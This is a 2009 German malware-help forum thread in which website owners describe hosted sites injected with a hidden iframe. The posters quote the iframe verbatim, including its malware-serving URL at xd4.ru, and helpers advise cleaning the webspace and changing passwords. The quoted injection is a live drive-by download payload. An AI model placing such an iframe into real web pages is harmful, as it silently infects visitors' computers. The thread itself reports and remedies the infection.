Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: 1und1-Server infiziert gehostete Websites

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 06.08.2009, 12:52   #1
peweerk
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht:
<iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe>
Wird eine infizierte Seite aufgerufen, werden Schadprogramme an den aufrufenden Computer gesendet:
icwsetup.exe, icowin.exe, hp32_nword.exe und andere. Außerdem führt die Infektion zur Google-Idexierung der Seite als Malware belastet.
Kennt jemand das Problem - und hat Lösungen? Danke im voraus.

Alt 06.08.2009, 15:16   #2
KarlKarl
/// Helfer-Team
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



Hi,

ich halte es für unwahrscheinlich, dass der Server die Webseiten infiziert. Da ich nicht weiß wo das ist, kann ich nicht nachsehen, ich rechne aber damit, dass irgendeine veraltete fehlerhafte Software, z.B. ein Forum, Gästebuch, eine Bildergalerie die Infektionen von außen ermöglicht. Falls Du alle betroffenen Seiten von deinem Computer aus hochlädst kann auch auf dem der Grund liegen. Z.B. ein Keylogger der die FTP-Passwörter abgreift.

Wer die Möglichkeit hat, auf einem Webspace Veränderungen vorzunehmen, der hat auch mehr Möglichkeiten als nur das Einfügen dieser Iframes. Dazu gehören auch beliebige Änderungen an Skripten oder neu hinzugefügte Skripte. Sichere Vorgehensweise ist es, den Webspace komplett zu löschen und eine saubere und nur aktuelle Software enthaltende Version draufzuladen. Ansonsten bleibt vermutlich eine irgendwo versteckte Backdoor unbemerkt, über die der Zugriff auch noch möglich ist, wenn die für den ersten Zugriff genutzte Lücke geschlossen wurde.

Karl
__________________


Alt 06.08.2009, 16:07   #3
peweerk
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



Danke, Karl.
Eine der betroffenen Seiten liegt seit über vier Jahren unangetastet auf dem 1und1-Server. Es sind auch keine Möglichkeiten zur Interaktion auf den Seiten eingebaut. Das ftp-Passwort habe ich sofort geändert, nachdem ich den Zugriff entdeckt hatte. Vor vier Tagen war das, seither repariere ich per Hand die infizierten index-Seiten. Das hällt in der Regel vier bis acht Stunden. Dann geht der Wahnsinn wieder los. Ich habe an den 1und1-Support geschrieben. Vielleicht haben die eine Lösung.
Eine Frage zum Abschluss: Da immer nur die index-Seiten angegriffen werden, gibt es eine Möglichkeit, über die Domain-Anwahl auf eine andere Startseite (xyz.html) zuzugreifen?
Peter.
__________________

Alt 06.08.2009, 22:56   #4
KarlKarl
/// Helfer-Team
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



Kannst Du Logs bekommen? Logs für die Zugriffe auf den Webserver und Zugriffe auf den FTP? Wäre gut, dann kannst Du dich darin umsehen, ob da drin steht, wie es funktioniert.

Wegen Wechsel von index.html auf xyz.html bin ich überfragt.

Wenn Du magst kannst Du mir die betreffenden Seitenadressen per PN schicken.

Alt 07.08.2009, 08:52   #5
peweerk
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



Die von 1und1 vorgeschlagenen Maßnahmen entsprechen im Wesentlichen deinen Vorschlägen: sauberes Backup und vor allem sämtliche Passwörter austauschen. Da es sich um immerhin 12 Webauftritte handelt, wurde das Reinigungsmanöver zum Nachtmarathon. Bei der Überprüfung gerade eben: keine Probleme mehr. 1und1 hat mir deutlich zu verstehen gegeben, dass meine Passwortauswahl Kinderkram gewesen sein muss (sechsstellige Wörter, keine Ziffern) und daher leicht zu knacken. Ich habe dazugelernt. Noch mal danke.


Alt 29.09.2009, 16:15   #6
iamafrauder
 
1und1-Server infiziert gehostete Websites - Standard

1und1-Server infiziert gehostete Websites



hi @all.

hab das selbe problem mit 1und1 seit ca. Januar. hab ein profi hosting paket bei 1und1 mit 7 webseiten.

wenn ich alle index.htm* datein auf dem server nicht auf "read only" setze, werden sie nach ca. 5-8h mit malware verseucht. und das ist noch ziemlich nervig wenn man einen webshop laufen hat, der für jede kategorie eine index anlegt.

z.B. http://xd4.ru:8080/ts/in.cgi?pepsi123 und noch paar anderen.

Die "Read-Only" Methode ging bis vor ca. 1 Woche gut. Nun scheinen die einen anderen weg gefunden zu haben und platzieren eine .htaccess datei aufm server. so das die seite nicht mehr erreichbar ist und sie können nun die index.html oder main.html dateien komplett ersetzen, trotz "ready-only".

Schon 10x an 1und1 Support geschrieben, jedesmla nur eine standart anwort von wegen , ich soll meine PCs überprüfen.... aber alle PCs sind 100% sauber.

Auch wurden die passwörter (20 stellig buchstaben/zahlen) schon 10x von mir geändert und auch bei den 1und1 Log dateien, ist kein ftp/webzugriff auf die manipulierten dateien zu finden. Also kann es nur direkt bei 1und1 auf dem Server die Malware Source liegen.

Wir werden jetzt 1und1 verlassen und zu einem anderen Anbieter gehen, wir haben die Schnauze voll.



F*** YOU 1und1 und euren NICHTVORHANDENEN SUPPORT !

Antwort

Themen zu 1und1-Server infiziert gehostete Websites
1und1, aufrufe, compu, computer, folge, führt, gesendet, hidden, iframe, infektion, infiziert, infizierte, lösungen, malware, problem, schadprogramme, seite, style, website, websites



Ähnliche Themen: 1und1-Server infiziert gehostete Websites


  1. WP: Wordpress Instanzen bei Provider 1und1 down
    Nachrichten - 28.01.2015 (3)
  2. CryptoPHP: Hinterlistiger Schadcode hat zehntausende Server infiziert
    Nachrichten - 28.11.2014 (0)
  3. 1und1 warnt mich vor Open Dns Resolver
    Plagegeister aller Art und deren Bekämpfung - 31.01.2014 (11)
  4. Telekom Mahnung von rechnungsstelle@1und1.de
    Diskussionsforum - 19.01.2014 (4)
  5. 1und1 Meldung Ihr Webspace wurde angegriffen
    Diskussionsforum - 08.05.2013 (8)
  6. 1und1 Warnmail wegen Zeus Trojaner
    Plagegeister aller Art und deren Bekämpfung - 09.04.2013 (10)
  7. Darkleech infiziert reihenweise Apache-Server
    Nachrichten - 03.04.2013 (0)
  8. GVU auf WIN 2008 Server nur 1 Benutzerkonto infiziert
    Log-Analyse und Auswertung - 06.03.2013 (2)
  9. Avira meldet JS/Blacole.KH.3 und KH.2 - Server wurde per Ftp infiziert
    Log-Analyse und Auswertung - 10.02.2013 (1)
  10. Rechnung von 1und1 Telecom mit PDF Anhang
    Plagegeister aller Art und deren Bekämpfung - 23.10.2012 (9)
  11. Webseite per FTP-Server infiziert, Ursachenforschung
    Plagegeister aller Art und deren Bekämpfung - 22.09.2012 (6)
  12. Windows 2003 Server W32/Downadupjob.gen!A infiziert C:/windows/tasks/AT1.job
    Log-Analyse und Auswertung - 08.04.2010 (3)
  13. 1und1 Mail und Backdoor Darkmoon
    Plagegeister aller Art und deren Bekämpfung - 14.01.2007 (9)
  14. 1und1 pdf.exe
    Plagegeister aller Art und deren Bekämpfung - 10.01.2007 (5)
  15. 1und1 Rechnung - Trojaner
    Plagegeister aller Art und deren Bekämpfung - 09.01.2007 (3)
  16. 1und1-Anhang ausgeführt ...
    Plagegeister aller Art und deren Bekämpfung - 09.01.2007 (7)
  17. Verbindung zum FTP-server fehlgeschlagen(1und1)
    Alles rund um Windows - 05.04.2005 (2)

Zum Thema 1und1-Server infiziert gehostete Websites - Mehrere meiner bei 1und1 gehosteten Websites wurden infiziert - ein iFrame wurde eingeschleust, der folgendermaßen aussieht: <iframe src="http://xd4.ru:8080/ts/in.cgi?pepsi123" width=125 height=125 style="visibility: hidden"></iframe> Wird eine infizierte Seite aufgerufen, werden Schadprogramme an - 1und1-Server infiziert gehostete Websites...
Archiv
Du betrachtest: 1und1-Server infiziert gehostete Websites auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.